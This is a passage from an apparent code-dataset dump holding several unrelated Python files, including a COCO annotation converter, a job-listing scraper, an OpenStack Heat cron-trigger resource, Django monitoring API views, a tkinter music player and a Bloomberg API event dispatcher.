os.path.exists('{}coco/{}2017/{}'.format(saved_coco_path,args.mode,file.split('/')[0])):\n #print(file.split('/')[0])\n os.makedirs('{}coco/{}2017/{}'.format(saved_coco_path,args.mode,file.split('/')[0]))\n if not os.path.exists(\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file)):\n shutil.copy(image_dir+file,\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file))\n elif os.path.exists('{}coco/{}2017/{}'.format(saved_coco_path,args.mode,file.split('/')[0])):\n if not os.path.exists(\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file)):\n shutil.copy(image_dir+file,\"{}coco/{}2017/{}\".format(saved_coco_path,args.mode,file))\n l2c = Csv2CoCo(image_dir=image_dir,total_annos=total_csv_annotations)\n if args.mode != 'test':\n instance = l2c.to_coco(in_keys)\n elif args.mode == 'test':\n instance = l2c.to_coco_test(in_keys)\n l2c.save_coco_json(instance, '{}coco/annotations/instances_{}2017.json'.format(saved_coco_path,args.mode))\n\n","repo_name":"Caoliangjie/coco_format_convert","sub_path":"csv2coco.py","file_name":"csv2coco.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"25167056807","text":"import csv\nimport requests\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\n\ncurrent_dir = Path(__file__).parent\n\n\ndef get_hh_data(date: datetime, period: timedelta = timedelta(minutes=120)):\n \"\"\"Собирает данные с hh.ru за указанный период.\"\"\"\n final_data = [\n [\n \"name\",\n \"salary_from\",\n \"salary_to\",\n \"salary_currency\",\n \"area_name\",\n \"published_at\",\n ]\n ]\n date = date.replace(microsecond=0)\n orient_date = date + timedelta(days=1)\n date -= period\n while True:\n date += period\n if date <= orient_date:\n break\n page = 0\n while True:\n page += 1\n url = f\"https://api.hh.ru/vacancies?date_from={date.isoformat()}&date_to={(date + period).isoformat()}&per_page=100&page={page}&specialization=1\"\n response = requests.get(url)\n print(response, repr(response.text))\n if response.status_code != 200:\n break\n data = response.json()\n for item in data[\"items\"]:\n if item[\"salary\"] is None:\n continue\n final_data.append(\n [\n item[\"name\"],\n item[\"salary\"][\"from\"],\n item[\"salary\"][\"to\"],\n item[\"salary\"][\"currency\"],\n item[\"area\"][\"name\"],\n item[\"published_at\"],\n ]\n )\n if page + 1 >= data[\"pages\"]:\n break\n with open(current_dir / \"hh.csv\", \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(final_data)\n\n\nif __name__ == \"__main__\":\n get_hh_data(datetime(2022, 12, 21))\n","repo_name":"FUFSoB/urfu-python","sub_path":"src/extra/hh.py","file_name":"hh.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5069165740","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_log import log as logging\n\nfrom heat.common import exception\nfrom heat.common.i18n import _\nfrom heat.engine import attributes\nfrom heat.engine import constraints\nfrom heat.engine import properties\nfrom heat.engine import resource\nfrom heat.engine import support\nLOG = logging.getLogger(__name__)\n\n\nclass CronTrigger(resource.Resource):\n \"\"\"A resource implements Mistral cron trigger.\n\n Cron trigger is an object allowing to run workflow on a schedule. User\n specifies what workflow with what input needs to be run and also specifies\n how often it should be run. Pattern property is used to describe the\n frequency of workflow execution.\n \"\"\"\n\n support_status = support.SupportStatus(version='5.0.0')\n\n PROPERTIES = (\n NAME, PATTERN, WORKFLOW, FIRST_TIME, COUNT\n ) = (\n 'name', 'pattern', 'workflow', 'first_time', 'count'\n )\n\n _WORKFLOW_KEYS = (\n WORKFLOW_NAME, WORKFLOW_INPUT\n ) = (\n 'name', 'input'\n )\n\n ATTRIBUTES = (\n NEXT_EXECUTION_TIME, REMAINING_EXECUTIONS\n ) = (\n 'next_execution_time', 'remaining_executions'\n )\n\n properties_schema = {\n NAME: properties.Schema(\n properties.Schema.STRING,\n _('Name of the cron trigger.')\n ),\n PATTERN: properties.Schema(\n properties.Schema.STRING,\n _('Cron expression.'),\n constraints=[\n constraints.CustomConstraint(\n 'cron_expression')\n ]\n ),\n WORKFLOW: properties.Schema(\n properties.Schema.MAP,\n _('Workflow to execute.'),\n required=True,\n schema={\n WORKFLOW_NAME: properties.Schema(\n properties.Schema.STRING,\n _('Name or ID of the workflow.'),\n required=True,\n constraints=[\n constraints.CustomConstraint('mistral.workflow')\n ]\n ),\n WORKFLOW_INPUT: properties.Schema(\n properties.Schema.MAP,\n _('Input values for the workflow.')\n )\n }\n ),\n FIRST_TIME: properties.Schema(\n properties.Schema.STRING,\n _('Time of the first execution in format \"YYYY-MM-DD HH:MM\".')\n ),\n COUNT: properties.Schema(\n properties.Schema.INTEGER,\n _('Remaining executions.')\n )\n }\n\n attributes_schema = {\n NEXT_EXECUTION_TIME: attributes.Schema(\n _('Time of the next execution in format \"YYYY-MM-DD HH:MM:SS\".'),\n type=attributes.Schema.STRING\n ),\n REMAINING_EXECUTIONS: attributes.Schema(\n _('Number of remaining executions.'),\n type=attributes.Schema.INTEGER\n )\n }\n\n default_client_name = 'mistral'\n\n entity = 'cron_triggers'\n\n def validate(self):\n super(CronTrigger, self).validate()\n if not (self.properties[self.PATTERN]\n or self.properties[self.FIRST_TIME]):\n raise exception.PropertyUnspecifiedError(self.PATTERN,\n self.FIRST_TIME)\n\n def _cron_trigger_name(self):\n return self.properties.get(self.NAME) or self.physical_resource_name()\n\n def handle_create(self):\n workflow = self.properties.get(self.WORKFLOW)\n name = self._cron_trigger_name()\n identifier = workflow[self.WORKFLOW_NAME]\n\n args = {\n 'pattern': self.properties.get(self.PATTERN),\n 'workflow_input': workflow.get(self.WORKFLOW_INPUT),\n 'first_time': self.properties.get(self.FIRST_TIME),\n 'count': self.properties.get(self.COUNT)\n }\n\n cron_trigger = self.client().cron_triggers.create(name, identifier,\n **args)\n self.resource_id_set(cron_trigger.name)\n\n def _resolve_attribute(self, name):\n if self.resource_id is None:\n return\n trigger = self.client().cron_triggers.get(self.resource_id)\n if name == self.NEXT_EXECUTION_TIME:\n return trigger.next_execution_time\n elif name == 
self.REMAINING_EXECUTIONS:\n return trigger.remaining_executions\n\n def get_live_state(self, resource_properties):\n # Currently mistral just deletes cron trigger that was executed\n # (i.e. remaining execution is reached zero). In this case we can't\n # found the cron trigger by mistral api. Suppose that live state of\n # cron trigger is equal to the state stored in heat, otherwise we may\n # go through undesirable update-replace. This behaviour might be\n # changed after\n # https://blueprints.launchpad.net/mistral/+spec/mistral-cron-trigger-life-cycle\n # will be merged.\n LOG.warning(\"get_live_state isn't implemented for this type of \"\n \"resource due to specific behaviour of cron trigger \"\n \"in mistral.\")\n return {}\n\n\ndef resource_mapping():\n return {\n 'OS::Mistral::CronTrigger': CronTrigger,\n }\n","repo_name":"openstack/heat","sub_path":"heat/engine/resources/openstack/mistral/cron_trigger.py","file_name":"cron_trigger.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"27"} +{"seq_id":"23005203413","text":"# coding = utf-8\nfrom operator import methodcaller\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\nfrom utils.element import getType\n\n\n# 导入包\ndef pys_import(pkg):\n components = pkg.split('.')\n mod = __import__(components[0] + '.' + components[1],\n fromlist=[components[2]])\n klass = getattr(mod, components[2])\n\n return klass\n\n\nclass Operation:\n def __init__(self, browser, element):\n self.browser = browser\n self.element = element\n\n def operation(self, config):\n if 'action' not in config.keys():\n return\n\n action = config.get('action', '')\n if not action:\n return\n\n if action == 'open':\n self.open(config)\n elif action == 'click':\n self.click()\n elif action == 'clickList':\n self.clickList()\n elif action == 'moveToClick':\n self.moveToClick()\n elif action == 'moveToClickList':\n self.moveToClickList()\n elif action == 'jsclick':\n self.jsclick()\n elif action == 'sendKeys':\n self.sendKeys(config.get('value'))\n elif action == 'modifyKeys':\n self.sendKeys(config.get('value'), True)\n elif action == 'sendListKeys':\n self.sendListKeys(config.get('value'), True)\n elif action == 'sendListKeys_10':\n self.sendListKeys_10(config.get('value'), True)\n elif action == 'upload':\n self.upload(config.get('value'))\n elif 'select' in action:\n self.select(action)\n else:\n # print('无操作'+action)\n pass\n\n # 打开操作,是click的一种,但是会判断是否已经打开过\n def open(self, config):\n if config.get('open').get('class') not in self.element.get_attribute(\n \"class\"):\n self.click()\n\n # 点击操作\n def click(self):\n self.element.click()\n\n # js点击操作\n def jsclick(self):\n self.browser.execute_script('arguments[0].click()', self.element)\n\n # 给列表填写值\n def clickList(self):\n for el in self.element:\n el.click()\n\n # 移动并点击操作\n def moveToClick(self):\n ActionChains(self.browser).click(self.element).perform()\n\n # 移动并点击操作\n def moveToClickList(self):\n for el in self.element:\n ActionChains(self.browser).click(el).perform()\n\n # 默认填写值\n def sendKeys(self, value, modify=False):\n self.writeKey(self.element, value, modify)\n\n # 给列表填写值\n def sendListKeys(self, value, modify=False):\n for el in self.element:\n self.writeKey(el, value, modify)\n\n # 给列表填写值(10次)\n def sendListKeys_10(self, value, modify=False):\n i = 0\n for el in self.element:\n if i == 10:\n break\n i = i + 1\n self.writeKey(el, 
value, modify)\n\n # 上传文件\n def upload(self, value):\n # filepath = os.getcwd() + value\n # print(filepath)\n # self.writeKey(element, filepath)\n self.writeKey(self.element, value)\n\n # 写值到元素里\n def writeKey(self, element, value, modify=False):\n if 'pkgpath' in value:\n callbacks = value.split(':')\n pkg = callbacks[1]\n func = callbacks[2]\n\n try:\n param = callbacks[3]\n if ',' in param:\n params = param.split(',')\n else:\n params = [param]\n except IndexError:\n params = []\n\n klass = pys_import(pkg)\n if params:\n value = methodcaller(func, params)(klass())\n else:\n value = methodcaller(func)(klass())\n\n # 清空旧值\n if modify:\n element.send_keys(Keys.CONTROL, \"a\")\n element.send_keys(Keys.DELETE)\n # element.clear()\n sleep(0.5)\n\n element.send_keys(value)\n\n # 选择元素\n def select(self, action):\n params = action.split('.')\n for el in self.element:\n is_show = el.is_displayed()\n if is_show:\n el.find_elements(getType(params[1]),\n params[2])[int(params[3])].click()\n","repo_name":"stingbo/pystest","sub_path":"utils/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"27"} +{"seq_id":"71498993352","text":"\"\"\"remove slack_oauth_state column\n\nRevision ID: 3f137bef24e4\nRevises: 21e8f6f7a837\nCreate Date: 2020-07-06 04:20:47.952399\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = \"3f137bef24e4\"\ndown_revision = \"21e8f6f7a837\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"slack_user\", \"slack_oauth_state\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column(\n \"slack_user\",\n sa.Column(\n \"slack_oauth_state\",\n sa.VARCHAR(length=36),\n autoincrement=False,\n nullable=True,\n ),\n )\n # ### end Alembic commands ###\n","repo_name":"busy-beaver-dev/busy-beaver","sub_path":"migrations/versions/20200706_04-20-47__remove_slack_oauth_state_column.py","file_name":"20200706_04-20-47__remove_slack_oauth_state_column.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"27"} +{"seq_id":"8085223248","text":"import librosa\nimport numpy as np\n\nsr = 16000\n\naudio1, sample_rate = librosa.load(\"./n_in_paris_speech.wav\", sr=16000)\nD1 = librosa.stft(audio1, n_fft=320)\nspec1, phase = librosa.magphase(D1)\nresult = np.log1p(spec1)\nnp.save(\"./n_in_paris_speech\", result)\n\naudio_config = dict(sample_rate=sr,\n window_size=.02,\n window_stride=0.01,\n window='hamming',\n noise_dir=None,\n noise_prob=0.4,\n noise_levels=(0.0, 0.5))\n\n# result = np.load(\"./n_in_paris_styled.wav_data.npy\")\nresult = np.load(\"./n_in_paris_speech.npy\")\nprint(result.shape)\na = np.exp(result) - 1\np = 2 * np.pi * np.random.random_sample(result.shape) - np.pi\nn_fft = int(audio_config['sample_rate'] * audio_config['window_size'])\n\nfor i in range(50):\n S = a * np.exp(1j * p)\n x = librosa.istft(S)\n p = np.angle(librosa.stft(x, n_fft))\n\n# librosa.output.write_wav(\"./n_in_paris_styled.wav\", x, sr)\nlibrosa.output.write_wav(\"./n_in_paris_saved.wav\", x, sr)\n","repo_name":"Eddie-yz/Fake-Rapper-Helper","sub_path":"save_wav.py","file_name":"save_wav.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36522152055","text":"import config\nimport requests\nimport json\nimport operator\nimport urllib.request\n\n# Set Up Azure API Connection:\nKEY = config.faceApiKey\nface_api_url = 'https://eastus.api.cognitive.microsoft.com/face/v1.0/detect?'\n# file url of face to examine goes here: \nimage_url = 'https://manofmany.com/wp-content/uploads/2020/02/How-to-make-yourself-stop-being-angry-in-60seconds.jpg'\n# add key to headers to get authorization\nheaders = {'Ocp-Apim-Subscription-Key': KEY}\n# only return emotion attribute in response\nparams = {\n 'returnFaceId': 'true',\n 'returnFaceLandmarks': 'false',\n 'returnFaceAttributes': 'emotion',\n}\n\n# make POST request and store response in response variable\nresponse = requests.post(face_api_url, params=params, headers=headers, json={\"url\": image_url})\n\n# extract json information until left with dictionary of emotions with corresponding values\ndata = response.json()\nfaceEmotion = data[0]['faceAttributes']\nemotionDict = faceEmotion['emotion']\n\n# get the emotion with the maximum value and store in clearestEmotion variable\nclearestEmotion = max(emotionDict.items(), key=operator.itemgetter(1))[0]\n\n\n# Set Up GIPHY API connection\ngiphyKey = config.giphyApiKey\ngiphySearchEndpoint = 'api.giphy.com/v1/gifs/search'\ndata = json.loads(urllib.request.urlopen(\"http://api.giphy.com/v1/gifs/search?q=\" + clearestEmotion + \"&api_key=\" + giphyKey + \"&limit=15\").read())\n","repo_name":"rhodesrm/EmotionSense","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20548461490","text":"from rest_framework.decorators import api_view\nfrom api.serializers import GroupSerializer, AppSerializer, 
host_serializer,\\\n app_history_serializer, app_statistics_serializer, manager_app_serializer\nfrom api.models import Group, App, Host, AppStatistics, AppHistory\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http.response import JsonResponse, HttpResponse\nfrom api.lib.utils import object_to_json, RepresentsInt, api\nfrom ipware.ip import get_ip\nfrom datetime import datetime\nimport json\nfrom api.lib.constant import MonitoringStatus\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef group_list(request):\n \"\"\"\n List all groups, or create a new group.\n \"\"\"\n if request.method == 'GET':\n tasks = Group.objects.all()\n serializer = GroupSerializer(tasks, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n unique_name = request.data.get(\"unique_name\")\n display_name = request.data.get(\"display_name\")\n if unique_name and display_name:\n checkgroup = Group.objects.filter(unique_name=unique_name).first()\n if checkgroup:\n res = {\"code\": 400,\n \"message\": \"Ops!, Unique name already exists\"}\n return Response(data=res,\n status=400)\n else:\n res = {\"code\": 400,\n \"message\":\n \"Ops!, Unique name and display name can't be null\"}\n return Response(data=res,\n status=400)\n group = Group.create(unique_name, display_name)\n group.save()\n serializer = GroupSerializer(group, many=False)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET', 'PUT'])\ndef group_detail(request, pk):\n \"\"\"\n Get, update, or delete a specific group\n \"\"\"\n try:\n group = Group.objects.get(pk=pk)\n except Group.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = GroupSerializer(group)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n group.unique_name = request.data.get(\"unique_name\", group.unique_name)\n group.display_name = request.data.get(\"display_name\",\n group.display_name)\n group.save()\n return JsonResponse(object_to_json(group))\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef app_list(request):\n\n if request.method == 'GET':\n groupid = request.GET.get('groupid', None)\n if groupid:\n tasks = App.objects.filter(enable=1).filter(group_id=groupid).all()\n else:\n tasks = App.objects.filter(enable=1).all()\n serializer = AppSerializer(tasks, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n name = request.data.get(\"name\", None)\n app = App.create(name, 1, \"OK\", \"\", 1, 2).save()\n serializer = AppSerializer(app, many=False)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@csrf_exempt\ndef app_detail(request, pk):\n try:\n try:\n pk = int(pk)\n app = App.objects.get(pk=pk)\n except:\n app = App.objects.filter(name=pk).first()\n except Group.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = AppSerializer(app)\n return JsonResponse(serializer.data)\n\n if request.method == 'DELETE':\n app.enable = 0\n app.save()\n serializer = AppSerializer(app)\n return JsonResponse(serializer.data)\n\n if request.method == 'PUT':\n if not app:\n res = {\"code\": 405, \"message\": \"App not found\"}\n return Response(data=res,\n status=405)\n ip = get_ip(request, right_most_proxy=True)\n if ip is not None:\n host = Host.objects.filter(ip=ip).first()\n if host is None:\n host = Host.create(ip)\n host.save()\n status = request.data.get(\"status\")\n statistics = request.data.get('statistics')\n app.message = 
request.data.get(\"message\", app.message)\n if status is None:\n res = {\"code\": 400,\n \"message\": \"wrong\"}\n return Response(data=res, status=400)\n app.status = status\n app.last_update = datetime.now()\n app.host_id = host.id\n app.save()\n if statistics:\n try:\n json.loads(statistics)\n except:\n res = {\"code\": 400, \"message\": \"Statistics format must be json\"}\n return Response(data=res,\n status=400)\n appStatistics = AppStatistics.create(statistics, app.id)\n appStatistics.save()\n return JsonResponse(object_to_json(app))\n\n\n@api_view(['GET', 'POST'])\n@csrf_exempt\ndef manager_detail(request, pk):\n try:\n pk = int(pk)\n app = App.objects.get(pk=pk)\n except:\n app = App.objects.filter(unique_name=pk).first()\n if not app:\n return HttpResponse(status=404)\n elif request.method == 'GET':\n serializer = manager_app_serializer(app)\n return JsonResponse(serializer.data)\n\n elif request.method == 'POST':\n app.name = request.data.get(\"name\", app.name)\n app.host_id = request.data.get(\"host_id\", app.host_id)\n app.group_id = request.data.get(\"group_id\", app.group_id)\n app.configuration = request.data.get(\"configuration\", app.configuration)\n app.save()\n serializer = manager_app_serializer(app, many=False)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET'])\ndef host_list(request):\n \"\"\"List all code hosts\n :rtype: json\n \"\"\"\n hosts = Host.objects.all()\n serializer = host_serializer(hosts, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@csrf_exempt\n@api_view(['GET', 'PUT'])\ndef host_detail(request, pk):\n \"\"\"\n Retrieve, update or delete a code host.\n \"\"\"\n try:\n host = Host.objects.get(pk=pk)\n except Host.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = host_serializer(host)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n host.name = request.data.get(\"name\", host.name)\n host.description = request.data.get(\"description\", host.description)\n host.save()\n return JsonResponse(object_to_json(host))\n\n\n@api_view(['GET'])\ndef app_history_list(request):\n if request.method == 'GET':\n limit = request.GET.get('limit', 12)\n appid = request.GET.get('appid')\n if not RepresentsInt(limit):\n res = {\"code\": 400, \"message\": \"Limit must be int\"}\n return Response(data=res,\n status=400)\n else:\n limit = int(limit)\n if not RepresentsInt(appid):\n res = {\"code\": 400, \"message\": \"Appid must be int\"}\n return Response(data=res,\n status=400)\n apphistory_list = AppHistory.objects.filter(app_id=appid).order_by('-id')[:limit]\n serializer = app_history_serializer(apphistory_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET'])\ndef app_statistics_list(request, pk):\n limit = int(request.GET.get('limit', 12))\n start_date = request.GET.get('startDate', None)\n end_date = request.GET.get('endDate', None)\n if start_date and end_date:\n appstatistics_list = AppStatistics.objects.filter(app_id=pk).filter(time__range=(start_date, end_date)).order_by('-id').all()\n else:\n appstatistics_list = AppStatistics.objects.filter(app_id=pk).order_by('-id')[:limit].all()\n serializer = app_statistics_serializer(appstatistics_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n\n@api_view(['GET'])\n@api\ndef count_groups_statistics_detail(request):\n grouplist = Group.objects.all().filter()\n group_message = []\n for group in grouplist:\n group_apps = 
App.objects.filter(group_id=group.id).filter(enable=1).all()\n ok_num = 0\n warn_num = 0\n critical_num = 0\n for app in group_apps:\n if app.status == MonitoringStatus.OK:\n ok_num += 1\n elif app.status == MonitoringStatus.WARN:\n warn_num += 1\n elif app.status == MonitoringStatus.CRITICAL:\n critical_num += 1\n group_app = {\"id\": group.id,\n \"uniqueName\": group.unique_name,\n \"displayName\": group.display_name,\n \"statistics\": {\"total\": len(group_apps),\n MonitoringStatus.OK.lower(): ok_num,\n MonitoringStatus.CRITICAL.lower(): critical_num,\n MonitoringStatus.WARN.lower(): warn_num,\n }\n }\n group_message.append(group_app)\n return group_message\n\n\n@api_view(['GET'])\n@api\ndef count_group_statistics_detail(request, pk):\n group = Group.objects.filter(id=pk).first()\n if group is None:\n res = {\"code\": 400, \"message\": \"Ops!, Don't find group by this id\"}\n return Response(data=res,\n status=400)\n group_apps = App.objects.filter(group_id=group.id).filter(enable=1).all()\n ok_num = 0\n warn_num = 0\n critical_num = 0\n for app in group_apps:\n if app.status == MonitoringStatus.OK:\n ok_num += 1\n elif app.status == MonitoringStatus.WARN:\n warn_num += 1\n elif app.status == MonitoringStatus.CRITICAL:\n critical_num += 1\n group_app = {\"id\": group.id,\n \"uniqueName\": group.unique_name,\n \"displayName\": group.display_name,\n \"statistics\": {\"total\": len(group_apps),\n MonitoringStatus.OK.lower(): ok_num,\n MonitoringStatus.CRITICAL.lower(): critical_num,\n MonitoringStatus.WARN.lower(): warn_num,\n }\n }\n return group_app\n","repo_name":"zjstrive/smallmonitor","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10245,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"27"} +{"seq_id":"8002258449","text":"import pygame\r\nimport tkinter\r\nfrom tkinter.filedialog import askdirectory\r\nimport os\r\n\r\nplayer = tkinter.Tk()\r\nplayer.title(\"Music Player\")\r\nplayer.geometry(\"310x325\")\r\n\r\nvar = tkinter.StringVar()\r\nvar.set(\"Select the song to play\")\r\n\r\nos.chdir(askdirectory())\r\nsonglist = os.listdir()\r\n\r\nplaying = tkinter.Listbox(player,font=\"Helvetica 12 bold\",width=28,bg=\"black\",fg=\"white\",selectmode=tkinter.SINGLE)\r\n\r\nfor item in songlist:\r\n playing.insert(0,item)\r\n\r\npygame.init()\r\npygame.mixer.init()\r\n\r\ndef play():\r\n pygame.mixer.music.load(playing.get(tkinter.ACTIVE))\r\n name = playing.get(tkinter.ACTIVE)\r\n var.set(f\"{name[:16]}...\" if len(name)>18 else name)\r\n pygame.mixer.music.play()\r\n\r\ndef pause():\r\n pygame.mixer.music.pause()\r\n\r\ndef resume():\r\n pygame.mixer.music.unpause()\r\n\r\ntext = tkinter.Label(player,font=\"Helvetica\",textvariable=var).grid(row=0,columnspan=3)\r\nplaying.grid(columnspan=3)\r\n\r\nplayB = tkinter.Button(player,width=7,height=1,font=\"Helvetica\",text=\"Play\",command=play,bg=\"lightgreen\").grid(row=2,column=0)\r\npauseB = tkinter.Button(player, width=7, height=1, font=\"Helvetica\", text=\"Pause\", command=pause, bg=\"lightblue\", fg=\"black\").grid(row=2,column=1)\r\nresumeB = tkinter.Button(player, width=9, height=1, font=\"Helvetica\", text=\"Resume\", command=resume, bg=\"lightpink\", fg=\"black\").grid(row=2,column=2)\r\n\r\nplayer.mainloop()","repo_name":"Navneety007/MusicPlayer","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} 
+{"seq_id":"3324945624","text":"# eventdispatcher.py\n\n\"\"\"Provide a dispatcher to dispatch events.\n\nThis component implements a dispatcher to dispatch events from one or more\nSessions through callbacks.\n\"\"\"\n\nimport warnings\nfrom . import internals\nfrom .chandle import CHandle\n\n\nclass EventDispatcher(CHandle):\n \"\"\"Dispatches events from one or more Sessions through callbacks\n\n :class:`EventDispatcher` objects are optionally specified when Session\n objects are created. A single :class:`EventDispatcher` can be shared by\n multiple Session objects.\n\n The :class:`EventDispatcher` provides an event-driven interface, generating\n callbacks from one or more internal threads for one or more sessions.\n \"\"\"\n\n __handle = None # pylint: disable=unused-private-member\n\n def __init__(self, numDispatcherThreads: int = 1) -> None:\n \"\"\"Construct an :class:`EventDispatcher`.\n\n Args:\n numDispatcherThreads: Number of dispatcher threads\n\n If ``numDispatcherThreads`` is ``1`` (the default) then a single\n internal thread is created to dispatch events. If\n ``numDispatcherThreads`` is greater than ``1`` then an internal pool of\n ``numDispatcherThreads`` threads is created to dispatch events. The\n behavior is undefined if ``numDispatcherThreads`` is ``0``.\n \"\"\"\n selfhandle = internals.blpapi_EventDispatcher_create(\n numDispatcherThreads\n )\n super(EventDispatcher, self).__init__(\n selfhandle, internals.blpapi_EventDispatcher_destroy\n )\n self.__handle = selfhandle\n\n def start(self) -> int:\n \"\"\"Start generating callbacks for events from sessions associated with\n this :class:`EventDispatcher`.\n \"\"\"\n\n return internals.blpapi_EventDispatcher_start(self.__handle)\n\n def stop(self, async_: bool = False, **kwargs: bool) -> int:\n \"\"\"Stop generating callbacks.\n\n Args:\n async\\_ : Whether to execute this method asynchronously\n\n Stop generating callbacks for events from sessions associated with this\n :class:`EventDispatcher`. If the specified ``async_`` is ``False`` (the\n default) then this method blocks until all current callbacks which were\n dispatched through this :class:`EventDispatcher` have completed. If\n ``async_`` is ``True``, this method returns immediately and no further\n callbacks will be dispatched.\n\n Note:\n If stop is called with ``async_`` of ``False`` from within a\n callback dispatched by this :class:`EventDispatcher` then the\n ``async_`` parameter is overridden to ``True``.\n \"\"\"\n\n if \"async\" in kwargs:\n warnings.warn(\n \"async parameter has been deprecated in favor of async_\",\n DeprecationWarning,\n )\n async_ = kwargs.pop(\"async\")\n\n if kwargs:\n raise TypeError(\n \"EventDispatcher.stop() got an unexpected keyword \"\n \"argument. Only 'async' is allowed for backwards \"\n \"compatibility.\"\n )\n\n return internals.blpapi_EventDispatcher_stop(self.__handle, async_)\n\n\n__copyright__ = \"\"\"\nCopyright 2012. 
Bloomberg Finance L.P.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to\ndeal in the Software without restriction, including without limitation the\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\nsell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions: The above\ncopyright notice and this permission notice shall be included in all copies\nor substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n\"\"\"\n","repo_name":"msitt/blpapi-python","sub_path":"src/blpapi/eventdispatcher.py","file_name":"eventdispatcher.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"27"} +{"seq_id":"11535589486","text":"'Compile Dosound DSL scripts to bytecode for playback on a real Atari.'\nfrom functools import reduce\nimport operator, sys\n\nclass Reg:\n\n def __init__(self, data, index, xform):\n self.data = data\n self.index = index\n self.xform = xform\n\n def put(self, *value):\n self.data.bytecode.extend([self.index, self.xform(*value)])\n\n def anim(self, preadjust, last):\n self.data.bytecode.extend([0x81, self.index, preadjust & 0xff, last])\n # If prev equals last we do a full cycle rather than nothing, see dosound0:\n value = self.data.prev\n while True:\n value = (value + preadjust) & 0xff\n self.data.totalticks += 1\n if value == last or value == self.data.prev:\n break\n\nclass UnsupportedTicksException(Exception): pass\n\nclass Data:\n\n def __init__(self):\n self.index = 0\n self.totalticks = 0\n self.bytecode = []\n\n def reg(self, xform = lambda x: x):\n r = Reg(self, self.index, xform)\n self.index += 1\n return r\n\n def setprev(self, prev):\n self.bytecode.extend([0x80, prev])\n self.prev = prev\n\n def sleep(self, ticks):\n if ticks < 2:\n raise UnsupportedTicksException(ticks)\n while ticks:\n part = min(256, ticks)\n self.bytecode.extend([0x82, part - 1])\n self.totalticks += part\n ticks -= part\n\n def save(self, f):\n w = lambda v: f.write(bytes(v))\n w([self.totalticks >> 8, self.totalticks & 0xff])\n w(self.bytecode)\n w([0x82, 0])\n\nclass 